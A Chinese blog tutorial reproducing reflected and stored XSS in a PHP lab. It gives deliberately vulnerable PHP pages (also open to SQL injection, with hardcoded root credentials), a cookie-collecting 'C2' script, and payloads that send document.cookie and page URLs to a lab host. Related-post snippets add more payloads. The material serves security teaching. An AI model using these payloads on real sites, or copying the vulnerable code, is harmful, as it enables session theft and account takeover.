xss反射型和存储型过程即实验PHP代码复现

原创 已于 2023-09-07 19:08:02 修改 · 366 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

于 2023-08-19 14:51:47 首次发布
文章探讨了C2服务器如何通过IP地址进行通信,以及XSS攻击中JavaScript如何利用getcookie和发送请求获取用户信息。强调了输入验证在防止此类攻击中的重要性,并介绍了存储型和反射型实现方式,以及数据库中的存储过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前置知识

IP和C2服务器

IP地址:相当于是每个电脑的编号,即每台联网的PC都要有IP地址,才能正常通信。

当然,有IP地址并不一定意味着可以通信。IP地址是用来标识计算机或网络设备在互联网上的位置的一组数字。通信需要更多的条件和组件,如网络连接、协议、端口等。除了IP地址,还需要确保网络连接正常、端口开放、通信协议匹配等因素,才能实现通信。因此,仅有IP地址并不足以保证通信的成功。

C2服务器

C2服务器是指命令与控制服务器(Command and Control Server),也称为C&C服务器。它是黑客或恶意软件使用的一种基础设施,用于远程控制被感染的计算机或网络。C2服务器负责接收来自恶意软件的指令,并将指令传达给受感染的计算机,以执行各种恶意活动,如数据盗取、攻击其他计算机等。

C2服务器通常使用隐藏的通信协议和技术,以避免被发现和追踪。它们可以通过域名、IP地址、IRC(Internet Relay Chat)、HTTP(Hypertext Transfer Protocol)等进行通信,以便黑客能够远程操控受感染的计算机或网络。

两者的关系

C2服务器和IP地址之间的关系是,C2服务器需要拥有一个或多个IP地址才能在互联网上进行通信。IP地址是用来标识计算机或网络设备在互联网上的位置的一组数字,它是网络通信的基础。C2服务器作为一个网络设备,也需要一个IP地址才能被其他计算机或网络找到并进行通信。

C2服务器可以使用一个固定的IP地址,也可以使用多个IP地址进行轮换和隐藏。黑客或恶意软件可以通过域名解析将域名映射到C2服务器的IP地址,以便远程控制被感染的计算机或网络。

总结来说,C2服务器需要拥有IP地址才能在互联网上进行通信,而IP地址是C2服务器被发现和进行通信的基础。

另:在实战中,恶意链接不会直接显示IP,会以域名的方式发送,而域名就好比这个人的名字,IP为其住址,溯源反制链路如下:

输入域名----域名解析服务器(dns)解析成ip地址---访问IP地址---完成访问的内容---返回信息

开始进入正题

反射型实现getcookie

info.txt是写入cookie等信息的,要记得授写权限

image-20230819105242779

php代码:

 //xssdemo.php文件
 //反射型:    
     session_start();
     $cont = $_GET['content'];
     echo "你的输入:".$cont;
 //getinfo.php文件
 c2服务器:
     $name = $_GET['username'];
     file_put_contents('./info.txt',$name);

1.通过js如何获取cookie信息:

 document.cookie

2.如何通过js发送请求:

 <script>new Image().src="http://192.168.32.129/secure19/xss/getinfo.php?username="+document.cookie</script>
 payload:
 <script>new Image().src="http://192.168.111.138/crm19/xss/getinfo.php?username="%2Bdocument.cookie</script>

image-20230819104934916

image-20230819105227303

image-20230819105231584

 其中http://192.168.111.138/crm19/xss/xssdemo.php?content=hello<script>new Image().src="http://192.168.111.138/crm19/xss/getinfo.php?username="%2Bdocument.cookie</script>

这是一个示例URL,其中包含一个潜在的跨站脚本攻击(XSS)漏洞。让我解释一下其中的细节:

URL中的参数content被设置为hello<script>new Image().src="http://192.168.111.138/crm19/xss/getinfo.php?username="%2Bdocument.cookie</script>。在这个参数的值中,我们可以看到一个JavaScript脚本被插入到了<script>标签中。

这个脚本的目的是创建一个新的Image对象,并将其src属性设置为另一个URL:http://192.168.111.138/crm19/xss/getinfo.php?username=加上当前文档的cookie值。这个URL将会发送一个GET请求,将cookie值作为参数发送给服务器。

换句话说,当用户访问这个URL时,浏览器会执行这段JavaScript代码,并发送一个带有用户cookie的请求到指定的URL。攻击者可以通过这种方式获取用户的敏感信息,如登录凭据或会话标识。

这种类型的攻击可以通过对输入进行适当的验证和过滤来防止。在这个例子中,应该对content参数进行输入验证,确保不允许插入任意的JavaScript代码。

 再比如
 ​
 http://192.168.111.138/crm19/xss/xssdemo.php?content=hello<button οnclick="javascript:location.href='http://192.168.111.138/crm19/xss/getinfo.php?username='%2Bdocument.cookie">点我</button>

image-20230819111315714

运行恶意链接并不会触发代码,如下

image-20230819111332981

点击点我之后就会触发链接,这是js代码的触发事件,关于js的事件还有很多,这里以最简单的onclick为例

image-20230819111339302

更近一步,获取其它信息,cookie+url获取

 //getinfo.php文件
 <?php
     $cookie = $_GET['cookie'];
     $url = $_GET['url'];
     // 追加法一
     // file_put_contents('./info.txt',$name,FILE_APPEND)
     //法二
     $f = fopen('./info.txt',"a");
     fwrite($f,'['.date("Y-m-d H:i:s").']    cookie='.$cookie."    url=".$url."\n");
     fclose($f);
 cookie+url获取
 ​
 <script>new Image().src="http://192.168.32.129/secure19/xss/getinfo.php?cookie="+document.cookie+"&url="+location.href</script>
 pyload:
 <script>new Image().src="http://192.168.32.129/secure19/xss/getinfo.php?cookie="%2Bdocument.cookie%2B"%26url="%2Blocation,href</script>
 ​
http://192.168.111.138/crm19/xss/xssdemo.php?content=hello<script>new Image().src="http://192.168.111.138/crm19/xss/getinfo.php?cookie="%2Bdocument.cookie%2B"%26url="%2Blocation,href</script>

image-20230819114233844

image-20230819114205585

反射过程

image-20230819144213869

存储型实现getcookie

php代码:

xssdemo.php   
    session_start();
    $cont = $_GET['content'];
    $addr = $_SERVER['REMOTE_ADDR'];
    $conn=mysqli_connect('192.168.32.129','root','123456','test');
    $sql = "insert into head(addr,referer) values('$addr','$cont')";
    $re = mysqli_query($conn,$sql);
    if($re){
        echo 'yes';
    }else{
        echo 'no';
    }
 get_message.php
 	$id=$_GET['id'];

    $conn=mysqli_connect('192.168.32.129','root','123456','test');
    $sql="select addr,referer from head where id='$id'";

    $re=mysqli_query($conn,$sql);
    $arr=mysqli_fetch_row($re);
    if($arr){
        echo $arr[0]."<hr>";
        echo $arr[1];
    }

C2服务器(get_info.php)

    $cookie =  $_GET['cookie'];
    $url = $_GET['url'];
    //file_put_contents('./info.txt',$name,FILE_APPEND);

    $f = fopen('./info.txt',"a");
    fwrite($f,'['.date("Y-m-d H:i:s").']    cookie='.$cookie."    url=".$url."\n");
    fclose($f);

image-20230819142920901

输入
http://192.168.111.138/crm19/xss/xssdemo.php?content=hello<script>new Image().src="http://192.168.111.138/crm19/xss/getinfo.php?cookie="%2Bdocument.cookie%2B"%26url="%2Blocation,href</script>

image-20230819143007695

数据库刷新后有如下

image-20230819142943302

看到恶意链接已经存储到服务器数据库中

之后有人访问到有恶意链接的网页(?id=15)

image-20230819143127936

此时受害人就已经中招,看到下面网络中有传输信息到C2 ,get_info.php被执行

image-20230819143212265

如下是C2服务器的文件夹

image-20230819143136124

存储过程

言默语
关注
存储xss案例
weixin_45694388的博客
08-15 1574
存储xss原理: 攻击者在页面插入xss代码,服务端将数据存入数据库,当用户访问存在xss漏洞的页面时,服务端从数据库取出数据展示到页面上,导致xss代码执行,达到攻击效果 案例: 在一个搭建的论坛网站中, 根据存储xss注入的条件,要找到可以存储到数据库的输入位置,并且这个位置还可以被其他用户查看, 例如在此网站中,我们可以尝试在发帖、评论区、标题、标签,以及个人主页的名称、签名、地址…等位置 帖子中: 发现只有点击xss才会显示弹窗,说明这不是一个存储xss,因为他只能影响到自己 发表后发
反射型XSS
arno234的博客
07-31 584
1.low 检查网站源码,发现没有对提交的数据进行过滤,直接输入 <script>alert(/xss/)</script> 2.medium replace()将<script>替换成null,由于对大小写敏感,可以将script大写 <SCRIPT>alert(/xss/)</SCRIPT> 由于只过滤了一次,也可以采用拼接的方...
反射性xss实验
qq_42981372的博客
04-24 1275
实验目的: 理解反射性xss的原理,学习反射性xss的实现过程实验原理:xss攻击是web攻击中最常见的攻击方法之一,恶意攻击者往web页面里插入恶意html代码,当用户浏览该页时,嵌入其中web里面HTML代码会被执行,从而达到恶意攻击用户的特殊目的。在xss的攻击方式中需要欺骗用户自己去点击链接才能触发xss的称为反射性xss实验步骤: 一.简单的反射型xss试验 1.在已经搭建好的实...
存储xss复现(无过滤附源码)
qq_40390383的博客
04-12 540
<html> <head> <script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie() </script> </head> <body> <form action="cunchuxss....
反射型XSS跨站请求实验
asways' bolg
12-28 299
反射型跨站脚本攻击实验 DVWA低安全等级 1.弹窗警告 在输入框中输入以下代码,点击上传,即可看到包含“弹窗内容”四字的弹窗警告 <script>alert("弹窗内容")</script> 2.页面嵌套 在输入框中输入以下代码,点击上传,即可看到包含百度搜索窗口的页面嵌套其中 <iframe src="http://baidu.com"></iframe> 3.页面重定向 在输入框中输入以下代码,点击上传,即可看到页面向百度网站进行跳转 <
XSS | 存储 XSS 攻击
Blue17 の 小窝
09-30 3057
从上面的攻击流程中,我们可以看到,存储 XSS 的攻击方式能将恶意代码永久的嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射型 XSS 攻击将没有多大作为,而存储 XSS 则不同,由于它注入在一些我们信任的页面,因此无论我们多么小心,都难免会受到攻击(谁会一直打开浏览器的源码模式抓包呀)。从上图可以看出来,使用不同的浏览器,在不同的时刻去查看之前的留言,都是能看到相同的内容的。表单,将数据传递给后端,后端接收到用户的数据后,使用自己编写的。
另一处反射型XSS
Fizz`s Blog
11-22 217
有的时候,为了切换页面,在源码中可以发现这样的代码   href='/AboutUs/ShowQueryResult.aspx?keyword=2@page1'>首页     href='/AboutUs/ShowQueryResult.aspx?keyword=2@page1'>上一页 然而这样的keywor
yxcms存储XSS至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 3200
yxcms存储XSS至getshell 漏洞复现
XSS复现
nixiaoge的博客
08-18 1495
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类包括反射型XSS、DOMXSSCSSXSS。防范措施包括输入验证、转义用户输入使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理防范方法。
存储XSS原理讲解及实战实验
liguangyao213的博客
12-23 3385
原理:使用者提交的XSS代码存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发xss代码。 输入内容后直接在下方回显,回显的地方就是我们插入的内容的地方。 根据显示代码进行闭合弹框尝试,payload: 黑客一般都会使用存储xss进行钓鱼。 在pikachu平台自带有钓鱼功能,鱼饵:http://81.68.155.178:82/pkxss/xfish/fish.php 将上面的鱼饵写入到我们的存储xss中,然后引诱鱼儿上钩: payload:&
XSS存储xss
wwwwyyyrre的博客
06-17 3802
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射型XSS编写一次代码只能进行一次攻击的特点,存储XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久XSS”。存储XSS反射型XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射型XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
DVWA 之 XSS(stored)存储XSS
RexHa的博客
10-08 2433
dvwa 存储XSS
DVWA-XSS (Stored)-存储XSS
seanyang_的博客
06-12 2942
跨站点脚本 (XSS)”攻击是一种注入问题,其中恶意脚本被注入到原本良性受信任的网站上。当攻击者使用 Web 应用程序发送恶意代码(通常以浏览器端脚本的形式)时,就会发生 XSS 攻击, 给其他最终用户。允许这些攻击成功的缺陷非常普遍,并且发生在使用输出中用户输入的Web应用程序的任何地方, 无需验证或编码。攻击者可以使用 XSS 向毫无戒心的用户发送恶意脚本。最终用户的浏览器无法知道脚本不应该被信任, 并将执行 JavaScript。
CSDN存储xss
deepdarkduck的博客
12-13 623
"/&gt;&lt;/a&gt;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;script src=https://wdl.xss.ht&gt;&lt;/script&gt;
xss存储
xu_1234567的博客
11-04 4954
1.存储xss原理 存储xss是hacker向服务器注入一段js代码代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
【DVWA】8. 存储XSS Stored(Low+Medium)
Zichel77的博客
12-13 1186
当用户访问该留言板页面时,恶意代码执行,通过document.cookie函数获取当前用户的cookie值,赋给站点xss.php文件,xss.php文件中定义也文件操作,将获取的cookie写入站点cookie.txt文件,此时攻击者就获取了用户的cookie值。我们测试一下在Message栏,能否执行标签,在测试过程中,name栏也有长度限制,我们修改其源码,增大长度插入标签。函数会对字符串中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。的 POST 变量。
3-3存储XSS漏洞演示
山兔的博客
04-14 2283
存储XSSDOMXSS的解析  存储XSS演示与原理分析  DomXSS演示原理分析 存储XSS漏洞 存储XSS漏洞跟反射型形成的原因一样,不同的是存储XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储XSS也称“永久XSS存储XSS漏洞演示 我们切换到pikachu存储xss栏目 我们看到他这个地方有留言板,我们试着留个言,点提交 我们发现这个留言会被存储到页面上面,我们刷新这个页面,留言一直在这里,也就是说,我们提交的这个留言,被后台给存下
存储xss利用思路
weixin_45698828的博客
10-23 1150
Js操纵的主体是浏览器,窃取的当然是浏览器的Cookie,所以有XSS的地方,你如果抓包改Cookie去访问,XSS是吃不到你修改过的Cookie,其实你访问的时候抓包就可以看到,第一次访问正常页面,第二次会GET传参访问XSS平台。存储存入数据库中,可持续时间长,而反射型持续时间短,仅对本次访问有影响,反射型一般要配合社工。反射型:一次性的东西,传参里面要有攻击代码 ,必须要想办法让管理访问这个链接,可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息。
存储XSS实验
qq_52579508的博客
07-04 588
原理:使用者提交的XSS代码存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发xss代码
站实现xss反射型xss存储的注入
最新发布
06-20
### XSS反射型存储注入的实现方式及代码示例 #### 反射型XSS 反射型XSS(Reflected XSS)是一种跨站脚本攻击,通常发生在Web应用程序将用户输入未经验证或编码后立即返回给用户的场景中。这种攻击的特点是恶意...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值